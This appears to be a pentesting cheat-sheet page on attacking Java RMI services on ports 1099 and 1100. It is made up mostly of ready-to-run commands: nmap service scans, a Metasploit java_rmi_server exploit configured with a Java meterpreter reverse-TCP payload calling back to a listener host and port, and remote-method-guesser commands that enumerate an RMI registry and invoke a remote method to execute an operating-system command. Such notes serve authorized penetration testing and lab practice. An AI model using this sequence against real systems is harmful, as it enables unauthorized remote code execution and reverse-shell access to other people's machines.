Skip to content

1099,1100 – Pentesting java rmi

RMI (Remote Method Invocation) is a Java API that allows Java objects to invoke methods on remote objects, in other words, it enables Java applications to invoke methods of objects running on remote JVMs (Java Virtual Machines). It provides a mechanism for creating distributed Java applications, where objects on different JVMs can interact with each other.

nmap

sudo nmap -p 1099,1100 -Pn $IP
sudo nmap -p 1099 -Pn -sC -sV $IP
|->
1100/tcp  open  java-rmi     Java RMI

metasploit

search java rmi

use exploit/multi/misc/java_rmi_server
# show payloads
# set pyload generic/shell_reverse_tcp
set payload java/meterpreter/reverse_tcp
set RHOSTS 10.0.2.8
set LHOST 10.0.2.15
set LPORT 4455
options
run

remote method guesser

wget https://github.com/qtc-de/remote-method-guesser/releases/download/v4.4.0/rmg-4.4.0-jar-with-dependencies.jar -O rmg.jar

java -jar rmg.jar enum $IP 36017

java -jar rmg.jar call $IP 1100 '"ping -c 10 10.0.2.15"' --signature 'String execute(String cmd)' --bound-name plain-server